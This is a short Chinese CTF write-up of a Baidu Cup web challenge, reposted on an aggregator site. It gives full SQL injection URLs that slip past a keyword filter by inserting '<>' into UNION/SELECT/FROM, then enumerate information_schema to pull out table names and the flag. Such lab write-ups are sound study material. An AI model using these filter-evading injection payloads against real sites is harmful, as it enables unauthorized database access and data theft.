百度杯CTF比赛九月场-WEB-题目名称：SQL - 走看看

zoukankan html css js c++ java

百度杯CTF比赛九月场-WEB-题目名称：SQL

1 根据提示和id参数判断这个地方有注入测试发现有过滤。使用<>可以绕过。先用orderby进行判断，发现3列，2处有回显。

2 查数据库名 http://57c4b2fc5d944e02b8b43b24021f5e66cac5ba713142483f.changame.ichunqiu.com/index.php?id=-1 uni<>on sel<>ect 1,schema_name,3 fro<>m information_schema.schemata

3 查表名 http://57c4b2fc5d944e02b8b43b24021f5e66cac5ba713142483f.changame.ichunqiu.com/index.php?id=-1 uni<>on sel<>ect 1,table_name,3 from information_schema.tables where table_schema="sqli" 4 显示列名 http://57c4b2fc5d944e02b8b43b24021f5e66cac5ba713142483f.changame.ichunqiu.com/index.php?id=-1 uni<>on sel<>ect 1,column_name,3 fro<>m information_schema.columns where table_name='info';

5 显示flag http://57c4b2fc5d944e02b8b43b24021f5e66cac5ba713142483f.changame.ichunqiu.com/index.php?id=-1 uni<>on sel<>ect 1,flAg_T5ZNdrm,3 fro<>m info;

查看全文

相关阅读:
有Blog的日子
 Android应用开发基础篇（6）Service
Android应用开发基础篇（7）BroadcastReceiver
Android应用开发基础篇（4）TabHost（选项卡）
Android应用开发基础篇（5）Handler与多线程
 Android应用开发提高篇（2）文本朗读TTS（TextToSpeech）
Android应用开发基础篇（9）SharedPreferences
Android应用开发基础篇（8）SurfaceView
Android应用开发基础篇（3）ListView
Android应用开发基础篇（2）Notification（状态栏通知）

原文地址：https://www.cnblogs.com/ly584521/p/13959283.html

Copyright © 2011-2022 走看看